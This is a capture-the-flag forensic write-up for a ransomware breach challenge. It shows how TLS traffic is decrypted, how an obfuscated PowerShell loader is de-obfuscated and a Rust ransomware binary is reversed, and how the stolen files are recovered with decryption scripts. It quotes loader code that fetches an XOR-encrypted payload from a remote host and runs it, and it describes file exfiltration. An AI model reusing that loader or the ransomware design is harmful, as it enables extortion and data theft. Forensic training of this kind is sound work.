Oczy: Windows Breach forensic challenge NexZero 2025

this challenge was a basic ransomware breach scenario, first we have a pcap file with sslkeys, you can start by importing them to the pcap to decrypt the traffic.
you can do this by going to edit->preferences->protocols->TLS->(Pre)-Master-Secret log filename and add the sslkeys file path there.

Identifying the malicious script:#

filter by http2.header.value == GET and you will find a request with a /raw/KWM6f0jW path, this path pattern is clearly from pastebin.com, inspecting the reponse you’ll find a powershell script.

copy paste the script into a text file and let’s start analysing it.

Deobfuscating the powerhshell script:#

first there is an ip address at the start:

1
$Inquisition_pursY_in_a_dangerous_world = "0xC0A83628" # this translates to 192.168.54.40
2
$Celestial_lore_cF_knowledge_begins_with_loss = 9000

we can rename them to ip and port.

after that you’ll notice a repeated pattern of:

1
# Oczy and Gras uncover Rafal’s hidden manuscripts, revealing centuries-old astronomical theories.
2
$client = New-Object System.Net.Sockets.TcpClient
3
$client.Connect($ip, $port)
4
$_for_intellectual_rebellionOcentric_truth = $client.GetStream()
5

6

7
$Scholars_unite_uSts_next_generation = [System.Text.Encoding]::UTF8."$GetB$ytes"("<character name>")
8
$_for_intellectual_rebellionOcentric_truth.Write($Scholars_unite_uSts_next_generation, 0, $Scholars_unite_uSts_next_generation.Length)
9

10
$Novak_confronts_Rafal_maintains_ = New-Object byte[] 8192
11
$Astronomical_disAstronomical_dis = New-Object System.IO.MemoryStream
12
do {
13
    $read3 = $_for_intellectual_rebellionOcentric_truth.Read($Novak_confronts_Rafal_maintains_, 0, $Novak_confronts_Rafal_maintains_.Length)
14
    if ($read3 -gt 0) { $Astronomical_disAstronomical_dis.Write($Novak_confronts_Rafal_maintains_, 0, $read3) }
15
} while ($read3 -gt 0)
16
$Evolutionary_researchChes_beyond_polity = $Astronomical_disAstronomical_dis.ToArray()
17
$Watch_guild_prinIts_in_15th_century = $Evolutionary_researchChes_beyond_polity
18
$_for_intellectual_rebellionOcentric_truth.Close()
19
$client.Close()
20
Start-Sleep -Seconds 15

here the script is connecting to the ip and port defined at the start, sending a AOT character name and recieves a response and saves in a variable, also it sleeps for 15 sec between connections, this is repeated 6 times

after the 6th time the script concatenates all the received responses with a specific order:

1
Petra Rall -> Hange Zoe -> Sasha Bleus -> Anni Leonhart -> Mikasa Ackerman -> Historia Reiss

after that it does a base64 decode and decompress using Gzip:

1
$word1 = "irshir"
2
$word2 = "n"
3
$word3 = "kabirya"
4

5
$key = [System.Text.Encoding]::UTF8."$GetB$ytes"((($word1 , $word2 ,$word3) -join '_' -replace 'i','o' -replace 'r','u'))
6
$KeyLength = $key.Length
7
$DecrypteBuffer = New-Object byte[] $DataBuffer.Length
8
for ($i = 0; $i -lt $DataBuffer.Length; $i++) {
9
    $DecrypteBuffer[$i] = $DataBuffer[$i] -bxor $key[$i % $KeyLength]
10
}

after decrypting the received data with xor key oushou_n_kabouya it saves the result as update.exe and verify it’s sha256, then executes it.

Recovering the Ranswomware binary:#

filter by tcp.port == 9000 && ip.src == 192.168.54.40 and follow the tcp stream, export the data as raw binary, this will be the encrypted ransomware binary.

1
tshark -r challenge.pcapng -Y "tcp.port == 9000" -T fields -e data > data.txt

to automate the extraction and decryption process you can use the following python script:

1
with open("data.txt", "r") as file:
2
    lines = file.read().splitlines()
3

4

5
def xor(data: bytes, key: bytes) -> bytes:
6
    retrun bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
7
keys = [
8
    "Petra Rall",
9
    "Hange Zoe",
10
    "Sasha Bleus",
11
    "Anni Leonhart",
12
    "Mikasa Ackerman",
13
    "Historia Reiss"
14
]
15
data = {}
16

17
key = None
18
for line in lines:
19
    if line.strip() == "":
20
        continue
21
    dec_line = bytes.fromhex(line.strip()).decode(errors="ignore")
22
    if dec_line  in keys:
23
        print("[*] Found key:", dec_line)
24
        key = dec_line
25
        data[dec_line ] = b""
26
    elif key is not None:
27
        data[key] += bytes.fromhex(line.strip())
28

29
for key in data.keys():
30
    print(f"[*] {key}: {len(data[key])} chunks")
31

32

33
bin = b""
34
# apped in order
35
bin += data["Petra Rall"]
36
bin += data["Hange Zoe"]
37
bin += data["Sasha Bleus"]
38
bin += data["Anni Leonhart"]
39
bin += data["Mikasa Ackerman"]
40
bin += data["Historia Reiss"]
41
bin = xor(bin, b"oushou_n_kabouya")
42
print("[*] Final binary size:", len(bin))
43
with open("out.bin", "wb") as file:
44
    file.write(bin)

this will give you the binary out.bin

Analyzing the Malware binary:#

let’s gather some info about the binary first,

1
➜ file out.bin
2
out.bin: PE32+ executable (console) x86-64, for MS Windows, 5 sections

using die you can see that this is a rust binary
die-rust

Open the bin in your favorite disassembler and add the associated pdb file.
I’ll go with IDA Pro, First in the main function, the program is taking the Document dir from either the HOME env var or from the public user, then runs the function purerustiness::get_paths() which returns a vector all files paths in the Document dir.

1
std::env::_var(v40, aHome, 4);
2
v0 = *(_QWORD *)&v40[0];
3
if ( *(_QWORD *)&v40[0] == 0x8000000000000001uLL )
4
{
5
v50 = v40[0];
6
v51 = v40[1];
7
}
8
else
9
{
10
v1 = *((_QWORD *)&v40[0] + 1);
11
RNvCskdKJRKLKjqM_7___rustc35___rust_no_alloc_shim_is_unstable_v2();
12
v2 = (_OWORD *)__rustc::__rust_alloc(16, 1);
13
if ( !v2 )
14
{
15
    v65 = v1;
16
    v64 = v0;
17
    alloc::raw_vec::handle_error(1, 16, &off_140025A98);
18
}
19
*v2 = xmmword_140025840;
20
*((_QWORD *)&v50 + 1) = 16;
21
*(_QWORD *)&v51 = v2;
22
*((_QWORD *)&v51 + 1) = 16;
23
*(_QWORD *)&v50 = 0x8000000000000001uLL;
24
if ( 2 * v0 )
25
    __rustc::__rust_dealloc(v1, v0, 1);
26
}
27
v64 = *((_QWORD *)&v50 + 1);
28
v65 = v51;
29
std::path::Path::_join((unsigned int)&v47, v51, DWORD2(v51), (unsigned int)aDocuments, 10);
30
if ( v64 )
31
__rustc::__rust_dealloc(v65, v64, 1);
32
v3 = v48;
33
v4 = v49;
34
std::sys::fs::metadata(&v37, v48, v49);
35
if ( (_DWORD)v37 == 2 )
36
{
37
if ( (v38 & 3) == 1 )
38
{
39
    v63 = v38 - 1;
40
    v64 = *(_QWORD *)(v38 - 1);
41
    v65 = *(_QWORD *)(v38 + 7);
42
    if ( *(_QWORD *)v65 )
43
    (*(void (__fastcall **)(unsigned __int64))v65)(v64);
44
    v5 = *(_QWORD *)(v65 + 8);
45
    if ( v5 )
46
    __rustc::__rust_dealloc(v64, v5, *(_QWORD *)(v65 + 16));
47
    __rustc::__rust_dealloc(v63, 24, 8);
48
}
49
Src = v3;
50
*(_QWORD *)&v31 = v4;
51
p_Src = &Src;
52
v33 = (__int64)<std::path::Display as core::fmt::Display>::fmt;
53
v37 = &off_140025790;
54
*(_QWORD *)&v38 = 2;
55
*((_QWORD *)&v38 + 1) = &p_Src;
56
v39 = 1u;
57
std::io::stdio::_eprint(&v37);
58
goto LABEL_70;
59
}
60
v55 = 0;
61
v56 = 8;
62
v57 = 0;
63
v66 = 1;
64
purerustiness::utils::get_paths(v3, v4, &v55);

after that ransomware is initializing the KEY here:

1
p_Src = 0;
2
v33 = 1;
3
v6 = 0;
4
v7 = 0;
5
while ( 1 )
6
{
7
v34 = v6;
8
v64 = v7;
9
if ( v7 >= 0x10 )
10
    break;
11
v8 = v7 - 9;
12
if ( v7 < 9 )
13
    v8 = v7;
14
v9 = byte_1400256F0[v7] ^ aTamjohert[v8];
15
if ( v6 == p_Src )
16
    alloc::raw_vec::RawVec<T,A>::grow_one(&p_Src, &off_140025740);
17
v7 = v64 + 1;
18
*((_BYTE *)v6 + v33) = v9;
19
v6 = (char ***)((char *)v6 + 1);
20
}
21
v65 = (__int64)p_Src;
22
v63 = v33;
23
core::str::converts::from_utf8(&v37, v33, v6);

we can get the key by xoring the bytes at byte_1400256F0 with the string tamjohert repeated, this gives us the key oushou_n_tkhsayt

after thet the key is beeing passed here

1
std::sync::once_lock::OnceLock<T>::initialize(&unk_140032000, &Src);

and then initializing the aes instance:

1
<aes::ni::Aes128Enc as crypto_common::KeyInit>::new(&Src, v12);

now the ranswomware loops over all the files paths gathered earlier and runs these functions:

1
purerustiness::utils::encrypt_file(&v43, &v37, &Src);
2
purerustiness::utils::send_file(&v61, v44, v45);
3
purerustiness::utils::delete_file(&v61);
4
purerustiness::utils::write_enc_file(&v61, v25, v26);

now we can go to the encrypt_file:
first it reads the file then it passes it to aes Block encryption

1
<aes::autodetect::Aes128 as cipher::block::BlockEncrypt>::encrypt_with_backend::inner(a3, &v24, &v24);

then encodes the result in base64 and returns it.

1
base64::engine::Engine::encode::inner(v27, Src, v28, v23);

now with the send send_file:
first it encode the file path using base64 then it connects to 192.168.56.40 on port 5577 and send the payload, the payload is formatted with:

1
alloc::fmt::format::format_inner(&v31, &v19);

the payload is content::filepath to get that :: you need to do some dynamic analysis or just test with a small file.

now i after encryting and sending the file the ransomware deletes the original file with delete_file function and then writes the encrypted content to a new file with .enc extension using write_enc_file function.

Recovering the encrypted files:#

first filter by tcp.port == 5577 && ip.src == 192.168.54.65 and get those tcp streams

1
tshark -r challenge.pcapng -Y "tcp.port == 5577 && ip.src == 192.168.54.65" -T fields -e data > files.txt

then use the following python script to extract the file paths and content:

1
import base64
2
from Crypto.Cipher import AES
3
from Crypto.Util.Padding import unpad
4

5
KEY = b"oushou_n_tkhsayt"
6

7

8
def aes_decrypt(data: bytes):
9
    try:
10
        cipher = AES.new(KEY, AES.MODE_ECB)
11
        plaintext_padded = cipher.decrypt(data)
12
        plaintext = unpad(plaintext_padded, AES.block_size)
13
        return plaintext
14
    except Exception as e:
15
        return f"<decrypt error: {e}>"
16

17

18
def b64_decode(data: str):
19
    return base64.b64decode(data)
20

21

22

23
def main():
24
    with open("files.txt", "r") as f:
25
        data = f.read()
26

27
    lines = data.splitlines()
28
    while True:
29
        try:
30
            lines.remove("")
31
        except ValueError:
32
            break
33
    b64_file = ""
34
    for line in lines:
35
        line = bytes.fromhex(line).decode(errors="ignore")
36
        if "::" in line:
37
            b64_file += line.split("::")[0]
38
            name = b64_decode(line.split("::")[1])
39
            file = b64_decode(b64_file)
40
            d = aes_decrypt(file)
41
            with open(name, "wb") as f:
42
                f.write(d)
43
            b64_file = ""
44
        else:
45
            b64_file += line
46

47

48
if __name__ == "__main__":
49
    main()

Conclusion:#

you’ll find the flag in meme_5.jpg:

nexus{1_h0p3_y0u_enj0y3d_1t_1_m34n_th3_m3m3}